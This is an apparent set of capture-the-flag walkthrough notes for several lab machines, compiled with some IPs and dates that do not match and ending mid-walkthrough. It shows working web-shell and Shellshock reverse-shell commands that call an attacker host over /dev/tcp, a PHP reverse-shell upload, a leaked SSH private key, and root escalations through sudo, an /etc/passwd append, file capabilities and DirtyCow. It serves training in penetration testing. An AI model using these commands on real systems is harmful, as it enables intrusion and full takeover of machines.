pg-sosimple-play

Exploitation Guide for SoSimple
Summary

This machine is exploited via a remote code execution vulnerability in the Social Warfare WordPress plugin. It is escalated by leaking a private SSH key of a user, followed by abusing misconfigured sudo permissions.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~# sudo nmap 192.168.120.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 22:51 EDT
Nmap scan report for 192.168.120.192
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Dirb

Using dirb, we can brute force web directories to reveal /wordpress

kali@kali:~# dirb http://192.168.120.192/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 22:54:51 2020
URL_BASE: http://192.168.120.192/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.192/ ----
+ http://192.168.120.192/index.html (CODE:200|SIZE:495)
+ http://192.168.120.192/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.120.192/wordpress/
...

Web Enumeration

Our next step is to run wpscan to see if we can identify any vulnerabilities and any usernames.

kali@kali:~# wpscan --url http://192.168.120.192/wordpress/ --enumerate p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.120.192/wordpress/ [192.168.120.192]
[+] Started: Fri Aug 21 23:27:01 2020

Interesting Finding(s):

...

[+] social-warfare
| Location: http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-08-18T17:05:00.000Z
| [!] The version is out of date, the latest version is 4.1.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.120.192/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt

We can see wpscan identified the social-warfare plugin and the version detected is 3.5.0.
Exploitation
Social Warfare Remote Code Execution

Searching for Social Warfare on Exploit Database we find this entry detailing a Remote File Inclusion vulnerability in the plugin.

To exploit the plugin we will first create the following PHP web shell and save it as payload.txt

<pre>system($_REQUEST[‘cmd’])</pre>

Next we need to host this file over HTTP as follows.

kali@kali:~# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

We can now download and run the exploit, appending &cmd=id to run our command.

kali@kali:~# python exploit.py -t http://192.168.120.192/wordpress/ –payload-uri http://kali/payload.txt\&cmd\=id
[>] Sending Payload to System!
[*] Received Response From Server!
[<] Received:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

.

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ cat payload.txt
<pre>system("bash -c 'bash -i >& /dev/tcp/192.168.49.207/8080 0>&1'")</pre>

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.207.78 - - [23/Sep/2021 10:25:49] "GET /payload.txt?swp_debug=get_user_options HTTP/1.0" 200 -

Then we visit logged in to wordpress as max ! http://192.168.207.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt

and use Netcat handler to catch the shell.

┌──(kali㉿puckie)-[~/offsec]
└─$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.78] 53318
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$

Escalation
Weak File Permissions

We’ll start our enumeration by investigating what files max has in his home folder.

www-data@so-simple:/home/max$ ls -la
ls -la
total 52
drwxr-xr-x 7 max max 4096 Aug 22 2020 .
drwxr-xr-x 4 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 max max 9 Aug 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3810 Jul 12 2020 .bashrc
drwx------ 2 max max 4096 Jul 12 2020 .cache
drwx------ 3 max max 4096 Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4096 Jul 12 2020 .local
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4096 Jul 14 2020 .ssh
-rw-r--r-- 1 max max 33 Sep 23 14:04 local.txt
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4096 Jul 12 2020 this
-rwxr-x--- 1 max max 43 Aug 22 2020 user.txt
www-data@so-simple:/home/max$

However, the other one looks legitimate, so we’ll copy it to our Kali machine.

www-data@so-simple:/home/max$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
www-data@so-simple:/home/max$

We can then login as max using the private key.

kali@kali:~# ssh -i id_rsa max@192.168.120.192
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
...
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$

Sudo Abuse

To get root access we’ll first see if max has access to run anything with sudo.

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service

It looks like we can run /usr/sbin/service as steven without needing a password. If we look at the entry for service on GTFOBins we can exploit this to get a shell as steven

max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

Continuing down this path we’ll check if steven can run anything with sudo as well.

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh

It appears we can run a script located in /opt/tools/server-health.sh as root without requiring a password. If we try and access this file we find that it doesn’t exist.

steven@so-simple:/$ ls -lah /opt/tools/server-health.sh
ls: cannot access '/opt/tools/server-health.sh': No such file or directory
steven@so-simple:/$ ls -lah /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -lah /opt
total 8.0K
drwxr-xr-x 2 steven steven 4.0K Jul 13 21:06 .
drwxr-xr-x 20 root root 4.0K Aug 14 10:57 ..

Fortunately, it looks like steven has write access to /opt so we can simply create the file and then execute it as root

steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ echo "/bin/bash" > /opt/tools/server-health.sh
steven@so-simple:/$ chmod +x /opt/tools/server-health.sh
steven@so-simple:/$ sudo /opt/tools/server-health.sh
root@so-simple:/# id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/#

Explained

root@so-simple:/home/max# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
#%sudo ALL=(ALL:ALL) ALL
max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
root@so-simple:/home/max#

.

pg-vegeta1-play

Exploitation Guide for Vegeta1
Summary:

This machine is exploited by recovering SSH credentials, which are encoded in Morse code inside an audio file. It is escalated by abusing misconfigured file permissions on /etc/passwd.

Enumeration:

Check for open ports with Nmap:

kali@kali:~# sudo nmap 192.168.120.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 09:50 EDT
Nmap scan report for 192.168.120.161
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Just two ports open, let’s have a look at port 80: vegeta-website

Let’s try searching for hidden directories:

root@kali:~/vulnhub/vegeta-1# gobuster -t 100 dir -e -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.0.18 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.18
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/19 21:13:53 Starting gobuster
===============================================================
http://192.168.0.18/login.php (Status: 200)
http://192.168.0.18/img (Status: 301)
http://192.168.0.18/image (Status: 301)
http://192.168.0.18/admin (Status: 301)
http://192.168.0.18/manual (Status: 301)
http://192.168.0.18/server-status (Status: 403)
http://192.168.0.18/bulma (Status: 301)
===============================================================
2020/07/19 21:19:10 Finished
===============================================================

We find a file and a few interesting sounding directories, let’s have a look:

┌──(kali㉿puckie)-[~/offsec/vegata1]
└─$ wget http://192.168.159.73/bulma/hahahaha.wav 
--2021-09-23 08:23:47-- http://192.168.159.73/bulma/hahahaha.wav
Connecting to 192.168.159.73:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 236124 (231K)

Saving to: ‘hahahaha.wav’

hahahaha.wav 100%[=============================>] 230.59K 521KB/s in 0.4s

2021-09-23 08:23:48 (521 KB/s) - ‘hahahaha.wav’ saved [236124/236124]

┌──(kali㉿puckie)-[~/offsec/vegata1]

Now we have a wav file, playing it we can tell it is morse code, use decoder to see what it says:

morse-code-decoder

We get a user called trunks, with a password u$3r, let’s try that SSH port we found earlier:

root@kali:~/vulnhub/vegeta-1# ssh trunks@192.168.0.18
The authenticity of host '192.168.0.18 (192.168.0.18)' can't be established.
ECDSA key fingerprint is SHA256:XL6IZaa/M6erCuxf2qEiDREMhwGWxwoGjo0XfO47bmU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.18' (ECDSA) to the list of known hosts.
trunks@192.168.0.18's password:
Permission denied, please try again.
trunks@192.168.0.18's password:
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72

At last we have found a way in. One of the first things I do is look in user folder for clues, here we see .bash_history:

trunks@Vegeta:~$ ls -la
drwxr-xr-x 3 trunks trunks 4096 Jun 28 21:32 .
drwxr-xr-x 3 root   root   4096 Jun 28 17:37 ..
-rw------- 1 trunks trunks  382 Jun 28 21:36 .bash_history
-rw-r--r-- 1 trunks trunks  220 Jun 28 17:37 .bash_logout
-rw-r--r-- 1 trunks trunks 3526 Jun 28 17:37 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28 19:45 .local
-rw-r--r-- 1 trunks trunks  807 Jun 28 17:37 .profile

Privilege EscalationPermalink

It is always worth checking this out, so we look at the contents:

trunks@Vegeta:~$ cat .bash_history
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history
exit

We see a password being salted then a new user called Tom added. Strange that this is being done by the user. Let’s check permission of the passwd file:

trunks@Vegeta:~$ ls -la /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd

We have write permissions as user trunks, let’s look at the passwd file:

root@Vegeta:/home/trunks# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<<SNIP>>

User Tom isn’t in passwd, but we can add him be using the line from the history file:

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

Now we can switch user to Tom using the password Password@973 we found above:

trunks@Vegeta:~$ su Tom
Password: (enter Password@973)
root@Vegeta:/home/trunks# id
uid=0(root) gid=0(root) groups=0(root)

pg-sumo-play

Exploitation Guide for Sumo
SummaryThis machine is exploited by the ShellShock vulnerability. It is escalated via the DirtyCow local root exploit.Enumeration
kali@kali:~/sumo$ nikto -h http://192.168.54.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.87
+ Target Hostname: 192.168.54.87
+ Target Port: 80
+ Start Time: 2021-09-20 15:23:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/sumo$ 

Two ports open so we're going to hit the web port with Nikto:

Keeping things simple, let’s just see if this is really vulnerable:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


Excellent!  We execute ID and we get a response.  Now let’s see if we can get a shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


With our handler setup:


Excellent!  We catch our shell and we clean up the environment.  Now let’s see what we’re dealing with:

gcc error ,We can fix that error with the following:

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Let’s also try :

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh
wget http://192.168.49.54/linux-exploit-suggester.sh
--2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh
Connecting to 192.168.49.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'

0K .......... .......... .......... .......... .......... 57% 227K 0s
50K .......... .......... .......... ...... 100% 2.58M=0.2s

2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891]

www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass

--snip--

[+] [CVE-2012-0809] death_star (sudo)

Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436

www-data@ubuntu:/tmp$

 

and yes we use dirty

https://github.com/FireFart/dirtycow/blob/master/dirty.c

.

 

pg-katana-play

Exploitation Guide for Katana

Summary

This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)                                                
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)                                                   
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)                                                 
                                                                                                               
-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guess work and the above message, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see file capability with +ep permission is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel. This concept is similar to how SUID functions. Linux’s thread privilege checking is based on capabilities. Capabilities work by breaking the actions normally reserved for root down into smaller portions. The file capability sets are stored in an extended attribute named security.capability.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 

.

unatended way : bruteforce ssh, and find katana /root

pg-sunsetnoontide-play

Exploitation Guide for SunsetNoontide
Summary

This machine is exploited via a remote code execution vulnerability in the Unreal IRC server v3.2.8.1. It is then escalated by a very simple password for the root user.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.187.120 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST
Nmap scan report for 192.168.120.228
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6667/tcp open irc

IRC

This scan shows a potential IRC server running on port 6667.
Let’s connect to this IRC server to see if we can gather more information.
